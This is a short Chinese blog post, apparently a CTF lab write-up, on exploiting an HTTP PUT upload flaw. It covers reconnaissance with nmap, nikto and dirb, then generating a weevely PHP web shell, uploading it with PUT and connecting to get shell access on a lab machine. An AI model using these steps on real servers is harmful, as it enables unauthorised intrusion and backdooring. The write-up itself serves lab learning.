【CTF】PUT上传漏洞

kali:192.168.223.131
target:192.168.223.174

通过arp-scan -l获取目标IP为192.168.223.174,nmap扫描一下,只开放22和80端口,80端口只是一张图片

nmap -p- -A 192.168.223.174

image

nikto扫一下

nikto -h http://192.168.223.174

image

dirb同时扫描

dirb http://192.168.223.174

image

发现一个叫test的文件有点问题,但访问后看不出来,看一下当前HTTP允许什么

curl -v -X OPTIONS http://192.168.223.174/test

image

发现当前http允许使用PUT,使用火狐自带的工具Poster

image

进行如下操作,木马选择weevely生成的,下载到Windows

weevely generate 123456 shell.php
http://192.168.223.174/test/shell.php
Content Type:application/x-php
//文件选择之前weevely生成的shell.php文件

image

点击PUT,然后返回201状态码即表示成功,此时刷新test目录shell.php将跳出来

image

之后weevely连接即可拿到权限

weevely http://192.168.223.174/test/shell.php 123456
shell_sh

image

posted @ 2022-04-10 17:22  icui4cu  阅读(157)  评论(0编辑  收藏  举报